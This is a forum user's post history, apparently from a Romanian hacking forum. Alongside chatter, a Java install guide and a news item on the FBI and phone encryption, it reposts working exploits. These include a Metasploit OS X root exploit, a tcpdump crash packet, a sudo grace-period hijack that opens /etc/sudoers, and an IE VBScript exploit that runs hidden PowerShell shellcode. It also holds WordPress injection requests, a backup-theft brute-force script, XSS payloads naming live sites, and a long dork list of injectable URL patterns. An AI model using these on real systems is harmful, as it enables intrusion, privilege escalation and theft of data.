Everything posted by Aerosol

  1. @quadxenon it was a joke. Still, 2 billion views is something...
  2. Thanks, I'll get some books and post them on RST as well.
  3. When these guys go on Google, the Google people say they're getting flooded. On: // 2 billion views ....
  4. Keep looking, maybe you'll get lucky.
  5. I keep wondering who's dumber, M. Badea or Gadea?
  6. @Eddie91 thanks a lot, man, they're very nice, plus I found something I had been looking for for a long time: Splatter Displacement Action | GraphicRiver. Thanks again.
  7. It's almost certainly from the power plant's electromagnetic field.
  8. Aerosol

    Hello!

    Hi, by the way, go easy on the ":) :X" and the like, we're not on Messenger.
  9. 1. Download the latest Java SE SDK version. Java SE - Downloads | Oracle Technology Network | Oracle

    At the time of writing the filename and version was jdk-7u17-linux-x64.tar.gz

    2. Untar the Archive

        tar -xzvf /root/jdk-7u17-linux-x64.tar.gz
        mv jdk1.7.0_17 /opt
        cd /opt/jdk1.7.0_17

    3. This step registers the downloaded version of Java as an alternative, and switches it to be used as the default:

        update-alternatives --install /usr/bin/java java /opt/jdk1.7.0_17/bin/java 1
        update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_17/bin/javac 1
        update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so 1
        update-alternatives --set java /opt/jdk1.7.0_17/bin/java
        update-alternatives --set javac /opt/jdk1.7.0_17/bin/javac
        update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so

    Source
  10. Source

        ##
        # This module requires Metasploit: http://metasploit.com/download
        # Current source: https://github.com/rapid7/metasploit-framework
        ##

        require 'msf/core'
        require 'rex'

        class Metasploit3 < Msf::Exploit::Local
          Rank = ManualRanking # Can cause kernel crash

          include Msf::Post::File
          include Msf::Exploit::EXE
          include Msf::Exploit::FileDropper

          def initialize(info={})
            super(update_info(info,
              'Name'          => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',
              'Description'   => %q{
                A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory
                corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel
                pointers can also be leaked, allowing a full kASLR bypass.

                Tested on Mavericks 10.9.5, and should work on previous versions.

                The issue has been patched silently in Yosemite.
              },
              'License'       => MSF_LICENSE,
              'Author'        =>
                [
                  'Ian Beer', # discovery, advisory, publication, and a most excellent blog post
                  'joev'      # copy/paste monkey
                ],
              'References'    =>
                [
                  [ 'CVE', '2014-4404' ],
                  [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],
                  # Heap overflow:
                  [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],
                  # kASLR defeat:
                  [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]
                ],
              'Platform'      => 'osx',
              'Arch'          => ARCH_X86_64,
              'SessionTypes'  => [ 'shell', 'meterpreter' ],
              'Targets'       => [
                [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', { } ]
              ],
              'DefaultTarget' => 0,
              'DisclosureDate' => 'Sep 24 2014'
            ))
          end

          # Report the host as vulnerable when its OS X version is below 10.10.
          def check
            if ver_lt(osx_ver, "10.10")
              Exploit::CheckCode::Vulnerable
            else
              Exploit::CheckCode::Safe
            end
          end

          def exploit
            exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
            binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
            binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
            exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
            payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

            print_status("Writing exploit file as '#{exploit_file}'")
            write_file(exploit_file, binary_exploit)
            register_file_for_cleanup(exploit_file)

            print_status("Writing payload file as '#{payload_file}'")
            write_file(payload_file, binary_payload)
            register_file_for_cleanup(payload_file)

            print_status("Executing payload...")
            cmd_exec("chmod +x #{exploit_file}")
            cmd_exec("chmod +x #{payload_file}")
            cmd_exec("#{exploit_file} #{payload_file}")
          end

          # Product version string as reported by sw_vers.
          def osx_ver
            cmd_exec("sw_vers -productVersion").to_s.strip
          end

          # True when version string a is lower than version string b.
          def ver_lt(a, b)
            Gem::Version.new(a) < Gem::Version.new(b)
          end
        end
  11. The FBI has made it no secret that it hates Apple and Google's efforts to encrypt files in your smartphones and tablets. Now court documents have emerged showing just how far the Feds are willing to go to decrypt citizens' data.

      The paperwork has shown two cases where federal prosecutors have cited the All Writs Act – which was enacted in 1789 as part of the Judiciary Act – to force companies to decrypt information on gadgets.

      The Act, which was signed into law by none other than George Washington and later revised in the 20th century, gives the courts the right to...

          issue all writs necessary or appropriate in aid of their respective jurisdictions and agreeable to the usages and principles of law.

      That's a pretty broad remit, but the Feds think it's just the thing to force Apple and others to break down privacy protections.

      Last month, New York prosecutors successfully persuaded a judge that the ancient law could be used to force an unnamed smartphone manufacturer to help unlock a phone allegedly used in a credit card fraud case. The judge ordered the manufacturer to offer "reasonable technical assistance" to make the phone's contents available.

      In a second case, in the northern California federal court, prosecutors specifically named Apple in a similar case using the All Writs Act. Documents obtained by Ars Technica show federal law enforcement sought to get Apple to unlock an iPhone 5S as part of a criminal case.

      The court filing states investigators were unwilling to try and open the iPhone for fear of damaging a crucial piece of evidence. They asked the courts to force Apple to give them a hand in safely extracting data from the passcode-protected phone.

      It's an interesting legal tactic, but the Feds may find out the hard way that the All Writs Act has its limitation.

      The argument used by Apple and Google over encryption is that, even if they wanted to help the Feds, they can't do anything about it – because modern iOS and Android encrypts data in a way that only the owner can decrypt. Apple and Google say they don't hold any skeleton keys to devices, although sensitive data may end up in the cloud for the cops to seize.

      "The court orders contemplate allowing companies to file an objection and if they can’t do it then Apple and Google would spend real time fighting this," EFF legal fellow Andrew Crocker told The Register.

      As for whether or not this law could be used to force smartphone sellers to include a backdoor or spyware for police, or even a front door as the FBI says it wants, Crocker said that such use of the All Writs Act isn't "a settled legal issue," and the EFF would be taking a long, hard look at any attempts to do so.

      Source
  12. @misefalfaie I know, man. Bratuleanu, note that misefalfaie is making fun of you, my friend; if you had looked at the end, the source was written there, but well, you had to comment too...
  13. @aelius thanks for the addition. Hm, I saw that it was posted on 20 Nov 2014 on Packet Storm, I searched the forum and found nothing, so I figured, well...
  14. @Ganav although I have nothing to do with this: this andrey is actually the scammer. https://rstforums.com/forum/92884-un-tepar-se-alge-cu-situl-descoperit.rst Look here and it will become clear + the theme is nulled, so he didn't pay a cent for it + he got tangled up in his own lies
  15. tcpdump 4.6.2 AOVD Unreliable Output
      tcpdump 4.6.2 Geonet Denial Of Service
      tcpdump 4.6.2 OSLR Denial Of Service

      Ha, ha, I also found some interesting exploits

      CVE-2014-8767 tcpdump denial of service in verbose mode using malformed OLSR payload

      1. Background

      tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

      2. Summary Information

      It was found out that malformed network traffic (OLSR-based) can lead to an application crash (denial of service) if verbose output of tcpdump monitoring the network is used.

      3. Technical Description

      The application decoder for the OLSR protocol fails to perform external input validation and performs insufficient checking on length computations leading to an unsafe decrement and underflow in the function

          olsr_print (const u_char *pptr, u_int length, int is_ipv6)

      In this function msg_len is extracted from the input without sufficient checks and subtracted sizeof(struct olsr_msg4) which leads to an underflow of msg_tlen which is used to call olsr_print_neighbor() which will crash. In case DNS reverse lookup is enabled, this will also lead to a large amount of invalid DNS reverse lookups.

      To reproduce start tcpdump on a network interface

          sudo tcpdump -i lo -s 0 -n -v

      (running the program with sudo might hide the segfault message on certain environments, see dmesg for details)

      and use the following python program to generate a frame on the network (might also need sudo):

          #!/usr/bin/env python
          from socket import socket, AF_PACKET, SOCK_RAW
          s = socket(AF_PACKET, SOCK_RAW)
          s.bind(("lo", 0))

          olsr_frame = "\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"

          s.send(olsr_frame)

      4. Affected versions

      Affected versions are 3.9.6 through 4.6.2

      5. Fix

      The problem is fixed in the upcoming version tcpdump 4.7.0

      6. Advisory Timeline

      2014-11-08 Discovered
      2014-11-09 Requested CVE
      2014-11-11 Reported vendor by email
      2014-11-12 Vendor made a fix available as repository patch
      2014-11-13 CVE number received
      2014-11-13 Published CVE advisory

      7. Credit

      The issue was found by Steffen Bauch, Twitter: @Steffenbauch, http://steffenbauch.de, using a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.
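The length underflow described in the tcpdump advisory above, shown as an added example that is not part of the original post and is not tcpdump's code. The 12-byte header layout, the sample messages and all function names are constructed for illustration; the point is the unsigned subtraction next to the validated form a dissector should use.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed 12-byte message header, used only for this illustration:
 * type(1) vtime(1) msg_len(2, big-endian) originator(4) ttl(1) hops(1) seq(2).
 * msg_len counts the header plus the payload that follows it. */
#define TOY_HDR_LEN 12u

/* Constructed sample: msg_len = 20, header + two 4-byte neighbor addresses. */
static const uint8_t GOOD_MSG[] = {
    0x02, 0x00, 0x00, 0x14,  10, 0, 0, 1,  1, 0, 0, 1,
    10, 0, 0, 2,  10, 0, 0, 3
};

/* Constructed sample: msg_len = 2, smaller than the header it sits in. */
static const uint8_t BAD_MSG[] = {
    0x02, 0x00, 0x00, 0x02,  10, 0, 0, 1,  1, 0, 0, 1
};

/* Read a big-endian 16-bit field. */
static uint16_t be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Unchecked form: the attacker-controlled length is reduced by the header
 * size in unsigned arithmetic. For msg_len < 12 the result wraps to a huge
 * value, which a caller would then treat as the number of payload bytes. */
unsigned int payload_len_unchecked(const uint8_t *msg)
{
    unsigned int msg_len = be16(msg + 2);
    return msg_len - TOY_HDR_LEN;
}

/* Checked form: validate against both the header size and the number of
 * bytes actually captured before subtracting. Returns 0 and stores the
 * payload length on success, -1 on a malformed or truncated message. */
int payload_len_checked(const uint8_t *msg, size_t caplen, unsigned int *out)
{
    unsigned int msg_len;

    if (caplen < TOY_HDR_LEN)
        return -1;                 /* header itself is truncated */
    msg_len = be16(msg + 2);
    if (msg_len < TOY_HDR_LEN)
        return -1;                 /* subtraction would underflow */
    if (msg_len > caplen)
        return -1;                 /* claims more data than was captured */
    *out = msg_len - TOY_HDR_LEN;
    return 0;
}

/* Walk back-to-back messages in buf and count the 4-byte neighbor
 * addresses they carry. Stops with -1 at the first inconsistent length,
 * so no read ever goes past buf + len. */
int count_neighbors(const uint8_t *buf, size_t len)
{
    int total = 0;

    while (len > 0) {
        unsigned int tlen;

        if (payload_len_checked(buf, len, &tlen) != 0)
            return -1;
        if (tlen % 4 != 0)
            return -1;             /* payload is not a whole number of addresses */
        total += (int)(tlen / 4);
        buf += TOY_HDR_LEN + tlen; /* msg_len >= 12 guarantees forward progress */
        len -= TOY_HDR_LEN + tlen; /* msg_len <= len guarantees no wrap here */
    }
    return total;
}

int main(void)
{
    printf("unchecked payload length, good message: %u\n",
           payload_len_unchecked(GOOD_MSG));
    printf("unchecked payload length, bad message:  %u\n",
           payload_len_unchecked(BAD_MSG));
    printf("neighbors in good message: %d\n",
           count_neighbors(GOOD_MSG, sizeof GOOD_MSG));
    printf("neighbors in bad message:  %d\n",
           count_neighbors(BAD_MSG, sizeof BAD_MSG));
    return 0;
}
```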
  16. What is sudo's grace period?

      When a user first calls sudo to launch some commands as root he will be asked for his own password. But if the user calls sudo again in the following 5 minutes, he won't be asked for the same password. That's because the password is cached in memory for a period of time called the « grace period ». This grace period mechanism is activated by default on every system I know where sudo can be found (Linux distros, OSX, BSDs…)

      Here is the exploit code (sudo_grace_period_exploit.sh) :

          function bash_history {
              if [ $? -ne 1 ] # previous command was successful
              then
                  if [ -z "${PWNED+xxx}" ] # this test is used to check if the system was already pwned
                  then
                      history 1 | grep -q -E '^[[:space:]]*[0-9]+ sudo '
                      if [ $? -eq 0 ] # previous command is a sudo one
                      then
                          sudo chmod 777 /etc/sudoers 2> /dev/null
                          PWNED="yes"
                          unset PROMPT_COMMAND 2> /dev/null
                      fi
                  fi
              fi
          }
          PROMPT_COMMAND=bash_history

      For More : http://dl.packetstormsecurity.net/1411-exploits/exploiting_sudo_grace_period.pdf

      In my opinion this is very interesting stuff. Spare 5 minutes of your time, it's worth it!
  17. <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <pre> |--------------------------------------------------------------------------| | Title: OLE Automation Array Remote Code Execution => Pre IE11 | | Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ | | Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) | | Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual | | Usage: http://www.fuzzysecurity.com/exploits/21.html | |--------------------------------------------------------------------------| Very nice black-magic yuange, don't think it went unnoticed that you have been popping shells since 2009 ??????????? |--------------------------------------------------------------------------| </pre> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") 'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!' 
payload="[base64 payload omitted]" command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" params="-NoP -NonI -Exec Bypass -Command " & command 'Original POC yuange 'set shell=createobject("Shell.Application") 'shell.ShellExecute "notepad.exe" 'With UAC 'shell.ShellExecute "powershell", params, "", "runas", 0 'Without UAC shell.ShellExecute "powershell", params, "", "", 0 end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next 
info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True 
End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html> Source
  18. Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
      CVE: CVE-2014-8877
      Plugin: CM Download Manager plugin
      Vendor: CreativeMinds - https://www.cminds.com/
      Product: https://wordpress.org/plugins/cm-download-manager/
      Affected version: 2.0.0 and previous version
      Fixed version: 2.0.4
      Google dork: inurl:cmdownloads
      Reported by: Phi Le Ngoc - phi.n.le@itas.vn
      Credits to ITAS Team - www.itas.vn

      ::DESCRIPTION::

      The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to gain full control of the application and the ability to use any operating system functions that are available to the scripting environment.

          GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
          Host: target.com
          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Accept-Encoding: gzip, deflate
          Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879
          Connection: keep-alive

      Vulnerable file: /wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php

      Vulnerable code: (Line: 130 -> 158)

          public static function alterSearchQuery($search, $query)
          {
              if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
              {
                  global $wpdb;
                  $search_term = $_GET['CMDsearch'];
                  if( !empty($search_term) )
                  {
                      $search = '';
                      $query->is_search = true;
                      // added slashes screw with quote grouping when done early, so done later
                      $search_term = stripslashes($search_term);
                      preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
                      $terms = array_map('_search_terms_tidy', $matches[0]);

                      $n = '%';
                      $searchand = ' AND ';
                      foreach((array) $terms as $term)
                      {
                          $term = esc_sql(like_escape($term));
                          $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
                      }
                      // the raw search term is concatenated into the body of a generated function
                      add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
                      remove_filter('posts_request', 'relevanssi_prevent_default_request');
                      remove_filter('the_posts', 'relevanssi_query');
                  }
              }
              return $search;
          }

      ::SOLUTION::

      Update to version 2.0.4

      ::DISCLOSURE::

      2014-11-08 initial vendor contact
      2014-11-10 vendor response
      2014-11-10 vendor confirmed
      2014-11-11 vendor release patch
      2014-11-14 public disclosure

      ::REFERENCE::

      https://downloadsmanager.cminds.com/release-notes/
      http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en

      ::COPYRIGHT::

      Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP.

      Source
  19. #!/bin/bash
      #Larry W. Cashdollar, @_larry0
      #Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
      #20141031 assumes the wordpress database is wordpress and the table prefix is wp_
      #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
      #http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
      #run ./exp targetsite

      DATE="20141031"; #Date to search

      if [ ! -e rainbow ]; then
      cat << -EOF- > rbow.c
      /*Create rainbow table for guessing wp-backup-db v2.2.4 backup path
      Larry W. Cashdollar*/
      #include <stdio.h>
      int
      main (void)
      {
        char string[16] = "0123456789abcdef";
        int x, y, z, a, b;
        for (x = 0; x < 16; x++)
          for (y = 0; y < 16; y++)
            for (z = 0; z < 16; z++)
              for (a = 0; a < 16; a++)
                for (b = 0; b < 16; b++)
                  printf ("%c%c%c%c%c\n", string[x], string[y], string[z], string[a], string[b]);
        return(0);
      }
      -EOF-

      echo "[+] Compiling rbow.c"
      gcc rbow.c -o rbow
      echo "[+] Creating rainbow table..."
      ./rbow > rainbow
      fi

      if [ ! -e found.txt ]; then
      Z=0
      K=`wc -l rainbow|awk '{print $1}'`;
      echo "[+] Searching....";
      for x in `cat rainbow`; do
        CPATH="http://$1/wp-content/backup-$x/";
        RESULT=`curl -s --head $CPATH|grep 200`;
        if [ -n "$RESULT" ]; then
          echo "[+] Location $CPATH Found";
          echo "[+] Received $RESULT";
          echo $x > found.txt;
          break; #break here
        fi;
        echo -n "Percent Done: ";
        Y=`echo "scale=6;($Z/$K)*100"|bc`;
        echo -n $Y
        echo "%";
        Z=$(( $Z + 1 ));
      done
      else
        x=`cat found.txt`;
      fi

      # Now that we have the directory lets try to locate the database backup file.
      K=999;
      for y in `seq -w 0 999`; do
        CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here
        RESULT=`curl -s --head $CPATH|grep 200`;
        if [ -n "$RESULT" ]; then
          echo "[+] Database backup $CPATH Found";
          echo "[+] Received $RESULT";
          wget $CPATH
          exit; #break here
        fi;
        echo -n "Percent Done: ";
        Y=`echo "scale=2;($Z/$K)*100"|bc`;
        echo -n $Y
        echo "%";
        Z=$(( $Z + 1 ));
      done

      Source
  20. WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure

      ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      [+] Author : KnocKout
      [~] Contact : knockout@e-mail.com.tr
      [~] HomePage : http://h4x0resec.blogspot.com
      [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )

      ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      |~App. : WordPress - (html5-mp3-player-with-playlist) Plugin
      |~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/
      |~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus
      |~Vulnerability Style : FULL PATH DISCLOSURE
      |[~]Date : "26.11.2014"
      |[~]Tested on : Kali Linux, Windows 7
      |DORK: inurl:html5plus/html5full.php
      ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      ==============[Exploitation]===============================
      http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php

      Source
  21. WordPress (Sexy Squeeze Pages) Plugin <= Reflected XSS Vulnerability

      ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      [+] Author : KnocKout
      [~] Contact : knockout@e-mail.com.tr
      [~] HomePage : http://h4x0resec.blogspot.com
      [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )

      ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      |~App. : WordPress (Sexy Squeeze Pages) Plugin
      |~Software: http://instasqueeze.com/jv/
      |~Vulnerability Style : Cross Site Scripting
      |[~]Date : "26.11.2014"
      |[~]Tested on : Kali Linux, Windows 7
      |DORK: inurl:wp-content/plugins/instasqueeze
      ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      | DEMO :
      http://instasqueeze.com ( Official )
      http://gogglerank.com/
      http://kangenwaterhq.com
      http://visualhandsconnect.com
      http://cynthialeecreations.com

      ==============[Exploitation]===============================
      /instasqueeze/lp/index.php
      id parameter is ( index.php ) not safe.

      HTTP://[VICTIM]/wp-content/plugins/instasqueeze/lp/index.php?id="><script>alert(1337)</script>

      Source
  22. Credit's : The Phant0m
page.php?area_id= category.php?catid= content.php?cID= newsitem.php?newsid= frontend/category.php?id_category= news/newsitem.php?newsID= things-to-do/detail.php?id= page.php?area_id= page.php?area_id= listing.php?cat= item.php?iid= customer/home.php?cat= staff/publications.php?sn= news/newsitem.php?newsID= library.php?cat= main/index.php?uid= library.php?cat= shop/eventshop/product_detail.php?itemid= news/newsitem.php?newsID= news/newsitem.php?newsID= library.php?cat= FullStory.php?Id= publications.php?ID= publications/book_reviews/full_review.php?id= newsitem.php?newsID= newsItem.php?newsId= site/en/list_service.php?cat= page.php?area_id= product.php?ProductID= releases_headlines_details.php?id= product.php?shopprodid= product.php?productid= product.php?product= product.php?product_id= productlist.php?id= product.php?shopprodid= garden_equipment/pest-weed-control/product.php?pr= product.php?shopprodid= browsepr.php?pr= productlist.php?id= kshop/product.php?productid= product.php?pid= showproduct.php?prodid= product.php?productid= productlist.php?id= index.php?pageId= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= wiki/pmwiki.php?page****= summary.php?PID= productlist.php?grpid= cart/product.php?productid= db/CART/product_details.php?product_id= ProductList.php?id= products/product.php?id= product.php?shopprodid= product_info.php?products_id= product_ranges_view.php?ID= cei/cedb/projdetail.php?projID= products.php?DepartmentID= product.php?shopprodid= product.php?shopprodid= product_info.php?products_id= index.php?news= education/content.php?page= Interior/productlist.php?id= 
products.php?categoryID= modules.php?****= message/comment_threads.php?postID= artist_art.php?id= products.php?cat= index.php?option= ov_tv.php?item= index.php?lang= showproduct.php?cat= index.php?lang= product.php?bid= product.php?bid= cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId= item_show.php?lid= ?pagerequested= downloads.php?id= print.php?sid= print.php?sid= product.php?intProductID= productList.php?id= product.php?intProductID= more_details.php?id= more_details.php?id= books.php?id= index.php?offs= mboard/replies.php?parent_id= Computer Science.php?id= news.php?id= pdf_post.php?ID= reviews.php?id= art.php?id= prod.php?cat= event_info.php?p= view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= naboard/memo.php?bd= bookmark/mybook/bookmark.php?bookPageNo= board/board.html?table= kboard/kboard.php?board= order.asp?lotid= english/board/view****.php?code= goboard/front/board_view.php?code= bbs/bbsView.php?id= boardView.php?bbs= eng/rgboard/view.php?&bbs_id= product/product.php?cate= content.php?p= page.php?module= ?pid= bookpage.php?id= view_items.php?id= index.php?pagina= product.php?prodid= notify/notify_form.php?topic_id= php/index.php?id= content.php?cid= product.php?product_id= constructies/product.php?id= detail.php?id= php/index.php?id= index.php?section= product.php?****= show_bug.cgi?id= detail.php?id= bookpage.php?id= product.php?id= today.php?eventid= main.php?item= index.php?cPath= news.php?id= event.php?id= print.php?sid= news/news.php?id= module/range/dutch_windmill_collection.php?rangeId= print.php?sid= show_bug.cgi?id= product_details.php?product_id= products.php?groupid= projdetails.php?id= 
product.php?productid= products.php?catid= product.php?product_id= product.php?prodid= product.php?prodid= newsitem.php?newsID= newsitem.php?newsid= profile.php?id= ********s_in_area.php?area_id= productlist.php?id= productsview.php?proid= rss.php?cat= pub/pds/pds_view.php?start= products.php?rub= ogloszenia/rss.php?cat= print.php?sid= product.php?id= print.php?sid= magazin.php?cid= galerie.php?cid= www/index.php?page= view.php?id= content.php?id= board/read.php?tid= product.php?id_h= news.php?id= index.php?book= products.php?act= reply.php?id= stat.php?id= products.php?cat_id= free_board/board_view.html?page= item.php?id= view_items.php?id= main.php?prodID= gb/comment.php?gb_id= gb/comment.php?gb_id= classifieds/showproduct.php?product= view.php?pageNum_rscomp= cart/addToCart.php?cid= content/pages/index.php?id_cat= content.php?id= display.php?ID= display.php?ID= ponuky/item_show.php?ID= default.php?cPath= main/magpreview.php?id= ***zine/board.php?board= content.php?arti_id= mall/more.php?ProdID= product.php?cat= news.php?id= content/view.php?id= content.php?id= index.php?action= board_view.php?s_board_id= KM/BOARD/readboard.php?id= board_view.html?id= content.php?cont_title= category.php?catid= mall/more.php?ProdID= publications.php?id= irbeautina/product_detail.php?product_id= print.php?sid= index_en.php?id= bid/topic.php?TopicID= news_content.php?CategoryID= front/bin/forumview.phtml?bbcode= cat.php?cat_id= stat.php?id= veranstaltungen/detail.php?id= more_details.php?id= english/print.php?id= print.php?id= view_item.php?id= content/conference_register.php?ID= 